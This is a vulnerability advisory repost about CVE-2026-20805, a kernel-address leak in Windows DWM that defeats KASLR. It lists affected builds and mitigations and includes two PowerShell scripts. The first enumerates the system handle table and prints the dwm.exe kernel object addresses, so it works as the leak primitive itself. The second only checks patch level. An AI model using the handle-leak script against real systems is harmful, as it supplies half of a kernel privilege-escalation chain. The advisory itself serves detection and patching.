DEV Community

CVE Reports

Originally published at cvereports.com

CVE-2026-20805: Glass Houses: Shattering KASLR via Windows DWM (CVE-2026-20805)


Vulnerability ID: CVE-2026-20805
CVSS Score: 5.5
Published: 2026-01-13

A seemingly benign information-disclosure vulnerability in the Windows Desktop Window Manager (dwm.exe) doubles as a KASLR-bypass primitive. By querying system handle information, an unprivileged local attacker can read the raw kernel virtual addresses of ALPC port objects belonging to DWM. That gives a later kernel memory-corruption exploit the fixed reference point it needs to compute kernel addresses reliably instead of guessing a randomized layout.

TL;DR

CVE-2026-20805 is a local information leak in dwm.exe that reveals kernel memory addresses. On its own it executes no code, but it lets an attacker who already runs code on the host bypass Kernel Address Space Layout Randomization (KASLR), one of the primary defenses against kernel memory-corruption exploits in Windows. It is listed in the CISA KEV catalog, which means exploitation in the wild has been confirmed; leaks of this kind are chained with a separate kernel bug to achieve privilege escalation.
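The leak described above and in the opening paragraph is a kernel-address disclosure through the system handle table. The following script is an added example, not code from the original page or from the GitHub projects it references: run as an ordinary (non-admin) user, it enumerates the handle table through NtQuerySystemInformation and reports how many dwm.exe handles come back with a non-zero kernel object address, so a practitioner can compare a host before and after patching. It assumes 64-bit Windows, Windows PowerShell 5.1 or PowerShell 7, and the SystemExtendedHandleInformation (class 64) entry layout given in the comments; the page does not describe the exact trigger for the CVE, so this is a generic exposure check, and resolving type indices to the "ALPC Port" type name (which needs NtQueryObject's type table) is left out.

```powershell
# Added example, not the page's or the referenced projects' code.
# Assumptions: 64-bit Windows; SystemExtendedHandleInformation = 64;
# SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX is 40 bytes on x64:
#   +0  Object (PVOID)          +8  UniqueProcessId (ULONG_PTR)
#   +16 HandleValue (ULONG_PTR) +24 GrantedAccess (ULONG)
#   +28 CreatorBackTraceIndex   +30 ObjectTypeIndex (USHORT) ...
# The buffer begins with NumberOfHandles and Reserved (ULONG_PTR each), 16 bytes.

if (-not ('NativeNt' -as [type])) {
    Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class NativeNt {
    [DllImport("ntdll.dll")]
    public static extern int NtQuerySystemInformation(
        int SystemInformationClass, IntPtr SystemInformation,
        int SystemInformationLength, out int ReturnLength);
}
'@
}

function Get-DwmHandleAddressExposure {
    $SystemExtendedHandleInformation = 64
    $StatusInfoLengthMismatch = -1073741820   # 0xC0000004 as a signed Int32
    $EntrySize  = 40
    $HeaderSize = 16

    # Get-Process lists processes of every session, so dwm.exe's PID is visible without privilege.
    $dwmPids = @(Get-Process -Name dwm -ErrorAction SilentlyContinue | ForEach-Object { [int64]$_.Id })
    if ($dwmPids.Count -eq 0) { throw 'dwm.exe is not running on this host.' }

    $len = 1MB
    $buf = [IntPtr]::Zero
    try {
        # Grow the buffer until the kernel accepts the length.
        while ($true) {
            $buf = [Runtime.InteropServices.Marshal]::AllocHGlobal($len)
            $ret = 0
            $status = [NativeNt]::NtQuerySystemInformation($SystemExtendedHandleInformation, $buf, $len, [ref]$ret)
            if ($status -eq 0) { break }
            [Runtime.InteropServices.Marshal]::FreeHGlobal($buf); $buf = [IntPtr]::Zero
            if ($status -ne $StatusInfoLengthMismatch) {
                throw ('NtQuerySystemInformation failed: 0x{0:X8}' -f $status)
            }
            $len = [Math]::Max($ret + 64KB, $len * 2)
        }

        $count = [Runtime.InteropServices.Marshal]::ReadInt64($buf, 0)
        $dwmHandles = 0; $exposed = 0
        $samples = New-Object System.Collections.Generic.List[string]
        for ($i = 0; $i -lt $count; $i++) {
            $off = $HeaderSize + $i * $EntrySize
            $ownerPid = [Runtime.InteropServices.Marshal]::ReadInt64($buf, $off + 8)
            if ($dwmPids -notcontains $ownerPid) { continue }
            $dwmHandles++
            $object = [Runtime.InteropServices.Marshal]::ReadInt64($buf, $off)
            if ($object -ne 0) {
                # A non-zero Object field is a raw kernel virtual address handed to an unprivileged caller.
                $exposed++
                if ($samples.Count -lt 5) {
                    $handle  = [Runtime.InteropServices.Marshal]::ReadInt64($buf, $off + 16)
                    $typeIdx = [Runtime.InteropServices.Marshal]::ReadInt16($buf, $off + 30)
                    $samples.Add(('pid={0} handle=0x{1:X} typeIndex={2} object=0x{3:X16}' -f $ownerPid, $handle, $typeIdx, $object))
                }
            }
        }
    } finally {
        if ($buf -ne [IntPtr]::Zero) { [Runtime.InteropServices.Marshal]::FreeHGlobal($buf) }
    }

    [pscustomobject]@{
        DwmProcessIds            = $dwmPids
        DwmHandles               = $dwmHandles
        HandlesWithKernelAddress = $exposed
        SampleEntries            = $samples.ToArray()
    }
}

Get-DwmHandleAddressExposure | Format-List
```

Run it once from a standard user account before the January 2026 update and once after the reboot; the interesting number is HandlesWithKernelAddress. A result of zero after patching for an unprivileged caller is what you want to see, while a non-zero count on a patched host means the handle table still hands kernel pointers to that integrity level and is worth a closer look with the referenced dumper tooling.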


⚠️ Exploit Status: ACTIVE

Technical Details

  • CWE ID: CWE-200
  • Attack Vector: Local (AV:L)
  • CVSS Score: 5.5 (Medium)
  • EPSS Score: 5.86% (estimated probability of exploitation activity within the next 30 days; a high percentile relative to other CVEs)
  • Impact: Kernel Address Space Layout Randomization (KASLR) Bypass
  • Exploit Status: Active Exploitation (CISA KEV)

Affected Systems

  • Windows 10 Version 1607 through 22H2
  • Windows 11 Version 23H2 through 25H2
  • Windows Server 2012 / 2012 R2
  • Windows Server 2016 / 2019 / 2022
  • Windows Server 2025

Fixed builds listed in the report (the other affected versions receive the same January 2026 cumulative update):

  • Windows 10 1809: < 10.0.17763.8276 (Fixed in: 10.0.17763.8276)
  • Windows 11 23H2: < 10.0.22631.6491 (Fixed in: 10.0.22631.6491)
  • Windows Server 2025: < 10.0.26100.7623 (Fixed in: 10.0.26100.7623)

Exploit Details

  • GitHub: C++ implementation of NtQuerySystemInformation dumper targeting DWM
  • GitHub: Python-based memory leak monitor for ALPC structures

Mitigation Strategies

  • Apply vendor patches immediately (January 2026 cumulative updates).
  • Hunt for processes that enumerate the system handle table (NtQuerySystemInformation with the handle-information classes) and have no business doing so. The call itself is common in legitimate tooling, so baseline normal callers first and alert on unusual ones rather than on every invocation.
  • Use Attack Surface Reduction (ASR) rules to make the initial local code execution harder; the attack vector is local, so the leak is only reachable by an attacker who already runs code on the host.

Remediation Steps:

  1. Identify vulnerable hosts by OS build (e.g., Windows 10 1809 below 10.0.17763.8276, Windows 11 23H2 below 10.0.22631.6491, Windows Server 2025 below 10.0.26100.7623).
  2. Deploy the January 13, 2026 security update via WSUS, MECM, or Windows Update.
  3. Reboot; the fix is not in effect until the updated ntoskrnl.exe and dwm.exe are loaded.
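The identification step above compares a host's build against the fixed builds the report lists. The script below is an added example, not code from the original page: it reads the local build and Update Build Revision (UBR) from the registry and classifies the host as Patched, Vulnerable, or Unknown. Only the three fixed builds printed on the page are encoded, so every other affected version deliberately comes back as Unknown rather than Patched; extend the table from the vendor advisory before using it fleet-wide.

```powershell
# Added example, not the page's own code. Fixed builds are the three the report lists;
# build 26100 is labelled as the page labels it (Windows Server 2025).
$FixedBuilds = @{
    17763 = @{ Name = 'Windows 10 1809';     FixedUbr = 8276 }
    22631 = @{ Name = 'Windows 11 23H2';     FixedUbr = 6491 }
    26100 = @{ Name = 'Windows Server 2025'; FixedUbr = 7623 }
}

function Test-Cve202620805Build {
    param(
        [Parameter(Mandatory)][int]$Build,   # CurrentBuildNumber, e.g. 17763
        [Parameter(Mandatory)][int]$Ubr      # Update Build Revision, e.g. 8276
    )
    $entry = $FixedBuilds[$Build]
    if (-not $entry) {
        # Affected versions without a fixed build on the page are never reported as Patched.
        return [pscustomobject]@{
            Build   = "10.0.$Build.$Ubr"
            Version = 'not in the fixed-build table'
            FixedAt = $null
            Status  = 'Unknown'
        }
    }
    [pscustomobject]@{
        Build   = "10.0.$Build.$Ubr"
        Version = $entry.Name
        FixedAt = "10.0.$Build.$($entry.FixedUbr)"
        Status  = if ($Ubr -ge $entry.FixedUbr) { 'Patched' } else { 'Vulnerable' }
    }
}

function Get-LocalWindowsBuild {
    # CurrentBuildNumber and UBR together form the 10.0.<build>.<ubr> string in the advisory.
    $cv = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    [pscustomobject]@{ Build = [int]$cv.CurrentBuildNumber; Ubr = [int]$cv.UBR }
}

$local = Get-LocalWindowsBuild
Test-Cve202620805Build -Build $local.Build -Ubr $local.Ubr
```

For a fleet, wrap the two functions in Invoke-Command against your host list and export the objects to CSV for the patch tracker. Note that UBR only advances once the cumulative update has been installed and the machine rebooted, so a host mid-way through step 3 still reports Vulnerable, which is the correct answer.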

Read the full report for CVE-2026-20805 on our website for more details including interactive diagrams and full exploit analysis.
